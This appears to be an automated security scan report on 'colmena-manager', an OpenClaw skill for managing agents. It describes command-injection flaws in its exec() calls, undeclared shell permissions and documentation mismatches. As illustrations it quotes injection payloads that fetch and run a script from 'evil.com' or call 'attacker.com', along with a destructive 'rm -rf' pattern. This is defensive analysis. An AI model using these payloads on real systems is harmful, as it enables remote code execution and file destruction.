colmena-manager Security Report — Suspicious | ClawSafe

50 /100

colmena-manager

Skill para gestionar y coordinar agentes de OpenClaw como una colmena

Skill presents as a legitimate OpenClaw agent manager but contains multiple command-injection vulnerabilities from unsanitized user-controlled input piped into shell commands, with shell execution entirely undeclared in documentation.

Skill Namecolmena-manager

Duration73.8s

Enginepi

⚠

Use with caution

Do not deploy. Replace all exec() calls with parameterized APIs. Remove direct shell command construction. Add proper allowed-tools declarations. Audit agent.id and name inputs for shell metacharacters before use in any command context.

Attack Chain 4 steps

⬡

Escalation Attacker registers a malicious agent with shell metacharacters in the ID (e.g., 'vision; wget http://evil.com/sh.sh|bash')

src/index.js:12

◎

Entry Victim runs 'colmena-manager health-check' to monitor the hive

src/index.js:120

⬡

Escalation healthCheck() calls exec() with ps aux | grep ${agent.id}, where agent.id contains un-sanitized shell metacharacters from step 1

src/index.js:131

◉

Impact Shell injection executes arbitrary commands (download + execute remote script) with the permissions of the running user

src/index.js:131

Findings 6 items

Severity	Finding	Location
High	Command injection via agentId in multiple exec() calls RCE The agentId parameter (sourced from the agents_list API response) is directly interpolated into shell commands via template literals in three separate locations: logs() at line 66, healthCheck() at line 131, and checkMemory() at line 162. An attacker who registers a malicious agent with shell metacharacters in the ID (e.g., 'main; curl http://attacker.com') can achieve arbitrary command execution on the host when any of these commands are invoked. command: `tail -n ${lines} /home/nvi/.openclaw/sessions/${agentId}/logs.txt` → Validate agentId against a strict alphanumeric/whitelist pattern before using in any shell command. Use OpenClaw's native session API instead of shell tail for log retrieval.	`src/index.js:66`
High	Command injection via workspace name in rm -rf RCE The workspace name argument passed to workspaceRemove() is directly interpolated into an rm -rf shell command without sanitization. While the base path /home/nvi/.openclaw/workspace- provides some containment, path traversal sequences like '../../../' could escape the intended directory and delete arbitrary files on the system as the executing user. command: `rm -rf /home/nvi/.openclaw/workspace-${name}` → Validate workspace name against a strict pattern (e.g., /^[a-z0-9-]+$/). Use Node.js fs.rmSync() with a verified absolute path instead of shell rm. Add a confirmation prompt before destructive operations.	`src/index.js:193`
High	Shell execution completely absent from SKILL.md Doc Mismatch SKILL.md's API section lists only OpenClaw native functions (agents_list, sessions_list, sessions_send, message, exec/process). It never discloses that exec() is used to run arbitrary shell commands (tail, ps, grep, awk, ls, mkdir, rm). Users deploying this skill have no indication it requires shell:WRITE permissions or executes system commands. - `exec` / `process`: Para health checks y diagnósticos del sistema → SKILL.md must explicitly declare shell:WRITE permission and list each shell command used. Users must give informed consent before a skill can execute system commands.	`SKILL.md:55`
Medium	Referenced HEARTBEAT.md does not exist Doc Mismatch SKILL.md advertises an automatic heartbeat script (HEARTBEAT.md) that runs every 30 minutes for health monitoring. This file is referenced in both SKILL.md and README.md but does not exist in the project. This is either an incomplete feature or documentation that overstates capabilities. `La skill incluye un archivo HEARTBEAT.md que se ejecuta automáticamente cada 30 minutos` → Either implement HEARTBEAT.md or remove all references to it from documentation. If implemented, declare its resource requirements explicitly.	`SKILL.md:64`
Medium	No allowed-tools declaration despite full shell/filesystem access Priv Escalation claws.json and SKILL.md do not declare any allowed-tools. The skill uses exec() for shell:WRITE operations (tail, ps, grep, awk, ls, mkdir, rm) and filesystem:WRITE operations (mkdir, rm -rf) across multiple methods. These permissions are entirely absent from any manifest, preventing the host AI from properly scoping the skill's capabilities. `No 'allowedTools' or 'permissions' field present` → Add an allowed-tools declaration to claws.json: {"tools": [{"name": "Bash", "resource": "shell", "level": "WRITE"}, {"name": "Write", "resource": "filesystem", "level": "WRITE"}]}	`claws.json:1`
Low	Hardcoded /home/nvi/ path creates dependency on specific user account Sensitive Access All file operations (logs, workspaces) hardcode /home/nvi/ as the base path. This is not declared as a prerequisite, and the path does not appear in SKILL.md requirements. The skill will silently fail on systems where this user does not exist. `/home/nvi/.openclaw/sessions/${agentId}/logs.txt` → Derive the OpenClaw data directory from an environment variable (e.g., OPENCLAW_HOME or XDG_DATA_HOME) or make it a configurable parameter.	`src/index.js:66`

Resource	Declared	Inferred	Status	Evidence
Shell	`NONE`	`WRITE`	✗ Violation	src/index.js:66 exec with tail \| src/index.js:131 exec with ps\|grep \| src/index.…
Filesystem	`NONE`	`WRITE`	✗ Violation	src/index.js:188 mkdir via exec \| src/index.js:193 rm -rf via exec
Skill Invoke	`NONE`	`READ`	✓ Aligned	src/index.js:13 agents_list, sessions_list, sessions_send — matches SKILL.md API…

1 Critical 3 findings

💀

Critical Dangerous Command 危险 Shell 命令

rm -rf /

src/index.js:193

🔗

Medium External URL 外部 URL

https://clawhub.com/colmena-manager

claws.json:15

📧

Info Email 邮箱地址

[email protected]

claws.json:18

File Tree

5 files · 14.1 KB · 552 lines

JavaScript 1f · 289L Markdown 2f · 211L JSON 2f · 52L

├─ ▾ 📁 src

│ └─ 📜 index.js JavaScript 289L · 7.9 KB

├─ 📋 claws.json JSON 31L · 671 B

├─ 📋 package.json JSON 21L · 470 B

├─ 📝 README.md Markdown 36L · 1.1 KB

└─ 📝 SKILL.md Markdown 175L · 4.0 KB

Dependencies 1 items

Package	Version	Source	Known Vulns	Notes
`openclaw`	`>=1.0.0`	npm (peer dep)	No	Peer dependency, not bundled. No known vulnerabilities.

Security Positives

✓ Skill implements its stated functionality (agent management) without additional hidden data exfiltration

✓ No base64-encoded payloads or obfuscated code blocks found

✓ No credential harvesting from ~/.ssh, ~/.aws, or .env files

✓ No network requests to external IPs detected

✓ No reverse shell, C2, or data theft mechanisms present

✓ No cron/scheduled task persistence mechanisms found

✓ No malicious dependencies detected; package.json has minimal legitimate dependencies

Scan Report

Attack Chain 4 steps

Findings 6 items

File Tree

Dependencies 1 items

Security Positives